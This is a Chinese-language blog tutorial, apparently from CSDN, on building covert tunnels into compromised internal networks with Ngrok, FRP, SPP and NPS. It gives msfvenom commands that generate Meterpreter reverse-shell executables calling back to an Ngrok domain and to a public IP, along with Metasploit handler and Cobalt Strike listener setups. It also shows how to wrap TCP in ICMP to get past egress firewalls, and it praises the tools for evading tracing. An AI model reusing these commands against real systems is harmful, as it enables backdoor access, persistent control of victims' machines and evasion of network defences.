内网安全-隧道搭建&穿透上线&FRP&NPS&SPP&Ngrok&EW项目

旨在代理连接肉鸡后实现本地渗透肉鸡网络架构

Linux:Proxychains

Windows:Sockscap Proxifier

穿透项目:Ngrok Frp Spp Nps EW(停更)

优点:穿透加密数据,中间平台,防追踪,解决网络问题

https://www.ngrok.cc

https://github.com/esrrhs/spp

https://github.com/fatedier/frp

https://github.com/ehang-io/nps

http://www.rootkiter.com/EarthWorm

#内网穿透-Ngrok-入门-上线

https://www.ngrok.cc/

支持的协议:tcp、http、https

支持的类型:正向代理、反向代理

1、服务端配置:

开通隧道-TCP 协议-指向 IP 和端口-开通隧道-连接隧道

2、客户端(攻击者主机)连接服务端:

./sunny clientid 133328291918(隧道id) //控制端连接 Ngrok 的服务器

将下图的内容上传到攻击者主机,

3、客户端生成后门配置监听:

注意生成的是tcp协议后门,生成木马是使用的是ngrok平台提供的域名

msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=10134 -f exe -o ngrok.exe

use exploit/multi/handler

set payload windows/meterpreter/reverse_http

set lhost 0.0.0.0

set lport 2222

run

攻击者主机使用隧道号与平台建立连接,受害者主机点击后门之后,反向连接ngrok平台提供的域名,流量经过转发到攻击者主机上,实现内网穿透。

攻击者主机打开msf开启监听,监听端口是刚生成隧道的本地端口2222,然后服务器点击木马即可上线

#内网穿透-Frp-简易型-上线

https://github.com/fatedier/frp

frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS

等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公

网。

自行搭建,方便修改,成本低,使用多样化,适合高富帅及隐私哥哥们

1.服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)

服务器修改配置文件 frps.ini:

common

bind_port = 7000

启动服务端:

./frps -c ./frps.ini

看我这篇文章详细介绍使用

frp搭建隧道-CSDN博客

内网穿透-Spp-特殊协议-上线

https://github.com/esrrhs/spp

支持的协议:tcp、udp、udp、icmp、http、kcp、quic

支持的类型:正向代理、反向代理、socks5正向代理、socks5反向代理

在对抗项目中有遇到过一些极端环境,比如目标封了tcp,http等常用出网的协议,

但是icmp,dns等协议可能因为业务需要或者管理者安全意识不到位导致没有封干净。

在这种场景下就可以使用这些容易被忽视的协议进行隧道的搭建。

防火墙对tcp的出站封杀,然后我们这里利用spp这个项目把tcp封装成icmp出网,icmp协议到攻击机成功上线

1、服务端: 监听本地icmp流量

./spp -type server -proto ricmp -listen 0.0.0.0

2、客户端: 将本地8082端口流量转发至47.94.236.117 8081端口上(TCP封装成ICMP)

spp -name "test" -type proxy_client -server 47.94.236.117 -fromaddr :8082 -toaddr :8081 -proxyproto tcp -proto ricmp

3、CS

监听器1:http 47.94.236.117 8081

监听器2:http 127.0.0.1 8082

生成后门:监听器2

将后门上传至受害者主机执行

内网穿透-nps-特殊协议-上线

内网渗透---隧道搭建&SPP与NPS内网穿透_spp代理上线cs-CSDN博客

注意服务端与客户端版本一致

nps默认配置文件使用了80,443,8080,8024端口

80与443端口为域名解析模式默认端口

8080为web管理访问端口

8024为网桥端口,用于客户端与服务器通信 默认账号密码:admin/123

1、启动

./nps install

./nps

访问vps的8080端口,默认账号密码:admin/123

2、创建客户端,生成密匙

3、添加协议隧道,绑定指向

-客户端:

1、连接服务端:

bash 复制代码
./npc -server=47.94.236.117:8024 -vkey=uajwhbu9155qh89v  #创建客户端后自动生成密钥

2、生成后门:

bash 复制代码
msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=5566 -f exe -o nps.exe

3、监听后门:

攻击者监听自己电脑本地的6666端口

bash 复制代码
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 6666
run
相关推荐
数字供应链安全产品选型1 小时前
29分钟!攻击者突破时间再创新低,灵境AIDR如何重新定义智能体安全治理?
安全
说实话起个名字真难啊1 小时前
2026数字中国创新大赛数字安全赛道writeup之web题目一
java·前端·安全
GJGCY1 小时前
2026企业RPA+AI智能体落地技术全景:四阶段演进与关键架构决策
人工智能·安全·ai·rpa·智能体
刘~浪地球2 小时前
API 安全设计最佳实践
运维·网络·安全
数字供应链安全产品选型2 小时前
从模型投毒到提示词注入:悬镜安全如何用AI原生安全体系覆盖AI攻击全链路?
人工智能·安全·ai-native
东方隐侠安全团队-千里2 小时前
AI Coding Agent 执行依赖安装前的安全检查清单:从 Composer 漏洞看到命令执行
人工智能·安全·php·composer
数字供应链安全产品选型3 小时前
AI原生安全不是“概念”是“刚需”:悬镜安全如何用灵境AIDR定义智能体安全新标准?
安全·ai-native
光路科技3 小时前
802.1X在工业以太网中的实践:不仅是认证,更是安全体系
网络·安全
Fate_I_C3 小时前
空安全与类型系统
安全·kotlin
数字供应链安全产品选型3 小时前
提示词注入、工具滥用、决策黑盒:灵境AIDR如何三步封堵智能体安全三大漏洞?
安全